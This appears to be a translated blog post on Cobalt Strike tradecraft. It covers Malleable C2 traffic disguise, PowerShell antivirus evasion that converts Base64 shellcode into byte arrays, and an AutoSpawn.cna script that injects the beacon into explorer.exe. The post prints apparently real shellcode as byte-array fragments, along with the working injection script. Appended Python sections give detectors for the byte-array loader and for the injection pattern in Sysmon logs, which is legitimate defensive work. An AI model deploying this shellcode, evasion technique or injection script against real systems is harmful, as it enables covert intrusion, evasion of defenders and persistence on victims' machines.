Malleable C2 Configuration
First, I fell into a pit right at the start. Isn't Cobalt Strike supposed to work out of the box? On reflection, no: if it did, its traffic signature would be obvious to everyone. This is where the Malleable C2 Profile comes in.
Malleable Command and Control (customizable command and control)
Malleable C2 is mainly used to control the network parameters of the Cobalt Strike Beacon payload; in other words, it lets us disguise or obfuscate our traffic, which in some complex environments makes it easier to get past firewalls.
There is a GitHub project, Malleable-C2, with ready-made profiles, and you can also write your own. I used a profile a senior classmate had sent me earlier, which disguises the traffic as a certain well-known search engine ("某度").
Without this traffic obfuscation, even if the PowerShell payload generated by CS evades AV, Windows Defender will still kill it once subsequent commands are issued.
In the Listener we should likewise use HTTPS, i.e. encrypted traffic, to get past the firewall more reliably.
PowerShell AV Evasion
First, we studied the generated payload and found that the FromBase64String function appears to be blacklisted: as soon as the scanner reaches that call, the file is flagged as malicious. So we can convert the Base64 string into byte-array form to get around it.
Example:
# Base64 form
[Byte[]]$var_code = [System.Convert]::FromBase64String('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')
# After conversion to byte arrays
[Byte[]]$PRZNAMJgM = [Byte[]](223,107,160,199,211,203,235,35,35,35,98,114,98,115,113,114,117,107,18,241,70,107,168,113,67,107,168,113,59,107,168,113,3,107,168,81,115,107,44,148,105,105,110,18,234,107,18,227,143,31,66,95,33,15,3,98,226,234,46,98,34,226,193,206,113,98,114,107,168,113,3)
[Byte[]]$qXHbRRolRZZT = [Byte[]](168,97,31,107,34,243,69,162,91,59,40,33,86,81,168,163,171,35,35,35,107,166,227,87,68,107,34,243,115,168,107,59,103,168,99,3,106,34,243,192,117,107,220,234,98,168,23,171,107,34,245,110,18,234,107,18,227,143,98,226,234,46,98,34,226,27,195,86,210,111,32)
[Byte[]]$ckKZjMGmMr = [Byte[]](111,7,43,102,26,242,86,251,123,103,168,99,7,106,34,243,69,98,168,47,107,103,168,99,63,106,34,243,98,168,39,171,107,34,243,98,123,98,123,125,122,121,98,123,98,122,98,121,107,160,207,3,98,113,220,195,123,98,122,121,107,168,49,202,108,220,220,220,126,73,35)
[Byte[]]$vvTYnbPAP = [Byte[]](106,157,84,74,77,74,77,70,87,35,98,117,106,170,197,111,170,210,98,153,111,84,5,36,220,246,107,18,234,107,18,241,110,18,227,110,18,234,98,115,98,115,98,153,25,117,90,132,220,246,202,176,35,35,35,121,107,170,226,98,155,152,34,35,35,110,18,234,98,114,98)
[Byte[]]$oDOZGtzgSPfbKla = [Byte[]](114,73,32,98,114,98,153,116,170,188,229,220,246,200,90,120,107,170,226,107,18,241,106,170,251,110,18,234,113,75,35,17,227,167,113,113,98,153,200,118,13,24,220,246,107,170,229,107,160,224,115,73,41,124,107,170,210,153,60,35,35,35,73,35,75,163,16,35,35,106,170)
[Byte[]]$gufwnOAtfMhSa = [Byte[]](195,98,154,39,35,35,35,98,153,86,101,189,165,220,246,107,170,210,107,170,249,106,228,227,220,220,220,220,110,18,234,113,113,98,153,14,37,59,88,220,246,166,227,44,166,190,34,35,35,107,220,236,44,167,175,34,35,35,200,144,202,199,34,35,35,203,161,220,220,220,12)
[Byte[]]$VijLlpTL = [Byte[]](90,102,102,121,35,25,136,29,162,130,154,90,159,51,243,41,183,201,37,25,83,202,137,45,19,105,236,112,193,211,0,132,190,108,113,229,230,111,227,247,140,235,227,189,25,238,232,120,73,196,180,146,42,21,36,73,176,150,81,237,230,120,205,42,20,228,120,182,178,122,140)
[Byte[]]$qmNNXvweeMJMH = [Byte[]](62,226,141,147,112,67,74,35,118,80,70,81,14,98,68,70,77,87,25,3,110,76,89,74,79,79,66,12,22,13,19,3,11,64,76,78,83,66,87,74,65,79,70,24,3,110,112,106,102,3,18,19,13,19,24,3,116,74,77,71,76,84,80,3,109,119,3,21,13,17,24)
[Byte[]]$uJyFfILlJHJfVoEZhHkrFaMHrh = [Byte[]](3,116,108,116,21,23,24,3,119,81,74,71,70,77,87,12,21,13,19,24,3,119,76,86,64,75,24,3,110,98,111,96,105,112,10,46,41,35,2,41,40,44,250,39,75,56,91,169,0,232,11,146,176,87,211,204,186,150,230,27,143,69,58,89,207,195,101,106,200,14,248)
[Byte[]]$CyVhsFXsPf = [Byte[]](99,142,155,235,48,148,33,152,7,207,159,218,237,177,248,217,128,141,197,21,38,229,191,215,82,36,129,123,80,161,255,211,170,244,196,42,68,246,100,192,32,147,243,193,203,65,77,246,43,238,40,14,132,97,229,154,212,18,235,123,97,1,100,78,225,127,145,167,115,23,117)
[Byte[]]$glxAhgUznZWUI = [Byte[]](163,106,141,53,59,115,0,244,1,95,37,105,126,184,222,79,12,2,103,68,210,214,209,195,198,243,37,43,240,113,187,206,98,181,109,91,229,186,35,125,8,81,10,63,36,209,57,60,178,193,249,249,8,244,52,138,253,102,115,65,193,52,5,38,200,225,149,251,61,207,226)
[Byte[]]$HTAAzLNjfk = [Byte[]](219,247,120,238,209,134,108,195,150,124,243,148,107,100,22,8,166,237,76,144,238,10,158,17,5,161,122,35,98,157,211,150,129,117,220,246,107,18,234,153,35,35,99,35,98,155,35,51,35,35,98,154,99,35,35,35,98,153,123,135,112,198,220,246,107,176,112,112,107,170,196)
[Byte[]]$HeDjjuDz = [Byte[]](107,170,210,107,170,249,98,155,35,3,35,35,106,170,218,98,153,49,181,170,193,220,246,107,160,231,3,166,227,87,149,69,168,36,107,34,224,166,227,86,244,123,123,123,107,38,35,35,35,35,115,224,203,92,222,220,220,18,26,17,13,18,21,27,13,17,16,26,13,17,23)
[Byte[]]$XOdUFuGpKi = [Byte[]](26,35,25,253,75,146)
[Byte[]]$jbMpyHdkOCXCCucode = $PRZNAMJgM + $qXHbRRolRZZT + $ckKZjMGmMr + $vvTYnbPAP + $oDOZGtzgSPfbKla + $gufwnOAtfMhSa + $VijLlpTL + $qmNNXvweeMJMH + $uJyFfILlJHJfVoEZhHkrFaMHrh + $CyVhsFXsPf + $glxAhgUznZWUI + $HTAAzLNjfk + $HeDjjuDz + $XOdUFuGpKi
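The bypass above works because the scanner keys on one function name. A defender-side check that looks at the script's structure instead (large numeric byte-array literals, a chain of `[Byte[]]` variables concatenated with `+`, and the plain `FromBase64String` loader form) catches both variants. This is an added example, not code from the original post or from the MyBypassAV_ps1.py project; the three sample scripts in `SAMPLES` are constructed for the demonstration and are not the page's payload, and the element and byte thresholds are assumed tuning values.

```python
import re

# Constructed sample scripts (not the page's payload): the Base64 loader form,
# the byte-array form with a concatenation chain, and a benign byte-array use.
SAMPLES = {
    "base64_form": "[Byte[]]$var_code = [System.Convert]::FromBase64String('QUFBQUFB')",
    "bytearray_form": (
        "[Byte[]]$PRZNAMJgM = [Byte[]](223,107,160,199,211,203,235,35,35,35,98,114,98,115,113,114,117,107,18,241)\n"
        "[Byte[]]$qXHbRRolRZZT = [Byte[]](168,97,31,107,34,243,69,162,91,59,40,33,86,81,168,163,171,35,35,35)\n"
        "[Byte[]]$ckKZjMGmMr = [Byte[]](111,7,43,102,26,242,86,251,123,103,168,99,7,106,34,243,69,98,168,47)\n"
        "[Byte[]]$code = $PRZNAMJgM + $qXHbRRolRZZT + $ckKZjMGmMr\n"
    ),
    "benign": "$bytes = [Byte[]](1,2,3,4)\n$s = [System.Text.Encoding]::UTF8.GetString($bytes)",
}

# [Byte[]](n,n,n,...): capture the comma-separated numeric list
BYTE_ARRAY_RE = re.compile(
    r"\[Byte\[\]\]\s*\(\s*((?:\d{1,3}\s*,\s*)+\d{1,3})\s*\)", re.IGNORECASE)
# [Byte[]]$x = $a + $b + $c ...  (three or more variables joined with +)
CONCAT_RE = re.compile(
    r"\[Byte\[\]\]\s*\$\w+\s*=\s*(?:\$\w+\s*\+\s*){2,}\$\w+", re.IGNORECASE)
B64_RE = re.compile(r"FromBase64String\s*\(", re.IGNORECASE)


def analyze(script: str, min_elems: int = 16) -> dict:
    """Return structural indicators for one PowerShell script text."""
    sizes = [m.group(1).count(",") + 1 for m in BYTE_ARRAY_RE.finditer(script)]
    big = [n for n in sizes if n >= min_elems]  # ignore small, ordinary arrays
    return {
        "from_base64": bool(B64_RE.search(script)),
        "byte_array_count": len(big),
        "byte_total": sum(big),
        "concat_chain": bool(CONCAT_RE.search(script)),
    }


def is_suspicious(script: str, byte_threshold: int = 64) -> bool:
    """Flag the loader regardless of whether it uses Base64 or byte arrays."""
    r = analyze(script)
    return (
        r["concat_chain"]
        or r["byte_total"] >= byte_threshold
        or (r["from_base64"] and "[Byte[]]" in script)
    )


if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, analyze(text), "suspicious" if is_suspicious(text) else "clean")
```

The point of the check is that it does not depend on any single API name: replacing `FromBase64String` with numeric literals changes nothing about the shape of the script that ends up with a large byte buffer assembled from fragments.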
There is an automation script on GitHub, MyBypassAV_ps1.py, which not only converts the payload to byte arrays but also obfuscates function and variable names with random strings.
After obfuscation the payload is basically undetected. Why "basically"? Because there is still a chance that the AV kills it while it is talking to the C2 (perhaps the traffic signature has not been fully cleaned up), so we want to migrate to another process as early as possible (also so that nobody spots a black console window and closes it).
So in the C2 profile I changed the session sleep time to 200ms.
On the very first check-in a plugin migrates the process automatically; all you need to do is load the AutoSpawn.cna file in the Client.
Within 200ms of the first check-in it migrates into explorer.exe and sets the sleep time of both the old and the new session to 5s to avoid being noticed.
# AutoSpawn.cna
on beacon_initial
{
    sub callback
    {
        # bps() output is one process per line: name\tppid\tpid\tarch\tuser\tsession
        $regex = '(.*\n)+explorer.exe\t\d+\t(\d+)(.*\n)+';
        $listener = "https";
        if ($2 ismatch $regex)
        {
            $pid = matched()[1];
            $inject_pid = $pid;
            if (-is64 $1)
            {
                $arch = "x64";
            }
            else
            {
                $arch = "x86";
            }
            binject($1, $pid, $listener, $arch);
            bsleep($1, 5, 37);
        }
    }

    # The spawned session checks in with $inject_pid as its own pid: only sleep, do not inject again
    if ($inject_pid != beacon_info($1, "pid"))
    {
        bps($1, &callback);
    }
    else
    {
        bsleep($1, 5, 37);
    }
}
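The migration step above leaves a clear host-side trace: a scripting host opens explorer.exe with injection-capable rights and then starts a thread in it at an address not backed by any module. The following detection, an added example and not part of the original post or of AutoSpawn.cna, runs over constructed Sysmon-style events (Event ID 10 ProcessAccess and Event ID 8 CreateRemoteThread; the field names follow the Sysmon schema, the process IDs, paths and addresses are invented for the sample) and reports the two events that match this pattern while leaving the benign ones alone.

```python
import json

# Constructed Sysmon-style events (not taken from the page). Event ID 10 is
# ProcessAccess, Event ID 8 is CreateRemoteThread; values are invented.
SAMPLE_EVENTS = [
    json.dumps({"EventID": 10,
                "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "SourceProcessId": 4812, "TargetImage": r"C:\Windows\explorer.exe",
                "TargetProcessId": 3020, "GrantedAccess": "0x1FFFFF"}),
    json.dumps({"EventID": 8,
                "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "SourceProcessId": 4812, "TargetImage": r"C:\Windows\explorer.exe",
                "TargetProcessId": 3020, "StartAddress": "0x000001D4A2B40000",
                "StartModule": "", "StartFunction": ""}),
    # benign: a service querying explorer with limited rights only
    json.dumps({"EventID": 10,
                "SourceImage": r"C:\Windows\System32\svchost.exe",
                "SourceProcessId": 900, "TargetImage": r"C:\Windows\explorer.exe",
                "TargetProcessId": 3020, "GrantedAccess": "0x1000"}),
    # benign: PowerShell opening explorer with query rights only (e.g. Get-Process)
    json.dumps({"EventID": 10,
                "SourceImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                "SourceProcessId": 5100, "TargetImage": r"C:\Windows\explorer.exe",
                "TargetProcessId": 3020, "GrantedAccess": "0x1000"}),
]

# Script hosts that rarely have a legitimate reason to write into other processes
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE: the minimum
# rights needed to write code into a process and start it
INJECT_MASK = 0x0002 | 0x0008 | 0x0020


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(evt: dict):
    """Return an alert string for one event, or None if it looks benign."""
    src = basename(evt.get("SourceImage", ""))
    tgt = basename(evt.get("TargetImage", ""))
    eid = evt.get("EventID")
    if eid == 10:
        access = int(evt.get("GrantedAccess", "0x0"), 16)
        if src in SCRIPT_HOSTS and (access & INJECT_MASK) == INJECT_MASK:
            return (f"EID10 {src} (pid {evt['SourceProcessId']}) opened {tgt} "
                    f"(pid {evt['TargetProcessId']}) with injection-capable access {hex(access)}")
    elif eid == 8:
        # An empty StartModule means the thread starts in memory no module backs
        if src in SCRIPT_HOSTS and not evt.get("StartModule"):
            return (f"EID8 {src} (pid {evt['SourceProcessId']}) created a remote thread in {tgt} "
                    f"at unbacked address {evt.get('StartAddress')}")
    return None


def scan(lines) -> list:
    """Run check_event over JSON log lines and collect the alerts."""
    alerts = []
    for line in lines:
        alert = check_event(json.loads(line))
        if alert:
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_EVENTS):
        print(a)
```

Correlating the two alerts on the same source and target pid is what turns this into a high-confidence signal: the access event alone is noisy, but a script host that first obtains write rights on explorer.exe and then starts an unbacked thread in it matches the migration described in the post almost exactly.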